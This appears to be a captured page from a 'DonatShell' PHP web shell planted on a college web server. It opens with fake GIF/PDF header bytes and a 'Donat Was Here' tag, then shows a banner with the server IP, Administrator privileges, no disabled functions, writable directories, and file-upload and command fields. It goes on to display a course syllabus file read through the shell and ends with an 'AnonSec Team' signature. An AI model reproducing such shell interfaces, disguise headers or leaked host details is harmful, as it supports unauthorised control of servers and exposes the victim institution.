GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/CST2146/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/CST2146/Syllabus.php
<?
// CST1025/Syllabus.php

$TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n";
ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path.
$skipAuthentication = true;
require('application.phpinc');
require('Course/courseInfo.phpinc');

$title = "Syllabus";
$headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title;
$pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title;
$pageMenu = 'Course/courseMenu.phpinc';
require('common/pageHeader.phpinc');

require('classInfo.phpinc');

$sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title;
require('common/sectionHeader.phpinc');
?>
<p>

<fieldset><legend>Description</legend>
This course is designed to give students the advanced skills they need to design a data driven web site. Topics covered in this course are: dynamically created creating web pages using data obtained from a database, the use of PHP as a server-side language to create the pages, and the use of MySQL as the database to store and obtain the data. Students will construct a business web site or application. Students will be running their projects on an actual web server with PHP and MySQL installed. This course is based on the use of textbook study and hands-on structured labs assigned by the Instructor.
<br>
(Prerequisites: None) (3 Credits) (1 Lecture, 2 Lab, 0 On the Job Training.)
</fieldset>

<fieldset><legend>Objectives</legend>
<ol class="obj">
	<li>Define the scope of a web site or application design.</li>
	<li>Design the layout for a site.</li>
	<li>Design and create the databases needed for a site.</li>
	<li>Use PHP to create web pages.</li>
	<li>Use PHP to query data from a database.</li>
	<li>Use PHP to insert new data or update existing data.</li>
	<li>Use PHP to generate CSS or Javascript files.</li>
	<li>Use MySQL tools to design and implement databases.</li>
	<li>Use MySQL to store the data for the site.</li>
	<li>Describe the difference between development, testing, and production sites.</li>
	<li>Use teams to design and develop web pages needed for a site.</li>
	<li>Setup a development environment and move it to a production site.</li>
</ol>
</fieldset>

<? 
require('ReferencesResources.phpinc');
$class = array();
$class['totalHours'] = 144;
$class['lectureHours'] = 48;
$class['labHours'] = 0;
$class['outsideHours'] = $class['totalHours'] - $class['lectureHours'];
?>

<fieldset><legend>Requirements</legend>
An average student will spend <?=$class['totalHours']?> hours performing course tasks: 
<? if ($class['lectureHours'] != 0) { ?><?=$class['lectureHours']?> hours of lecture<?=$lectureHoursPunctuation?><? } ?>
<? if ($class['labHours'] != 0) { ?><?=$class['labHours']?> hours working on assigned tasks in the lab<?=$labHoursPunctuation?><? } ?>
<? if ($class['lectureHours'] == 0 && $class['labHours'] == 0) { ?>No class hours, <? } ?>
<? if ($class['outsideHours'] != 0) { ?><?=$class['outsideHours']?> hours out-of-class<? } ?>
. Factual information is provided through informal presentation or in a personalized format. The student is expected to contact the instructor if difficulty is encountered or help is needed.
<? if ($class['lectureHours'] != 0 || $class['labHours'] != 0) { ?> Attendance is critical for completion of the class work.<? } ?>
</fieldset>

<fieldset><legend>Grading</legend>
Assignment and quiz grades are totaled and translated to a percentage and the percentages to grades. A score of 70% is passing. The following percentage distribution guarantees the following grade: A:93%+, A-:90%+, B+:87%+, B:83%+, B-:80%+, C+:77%+, C:73%+, C-:70%+, F:&lt;70%.
</fieldset>

</p>
<?
require('Course/DisabilityNotice.phpinc');
require('common/sectionFooter.phpinc');
require('common/pageFooter.phpinc');
?>

Anon7 - 2022
AnonSec Team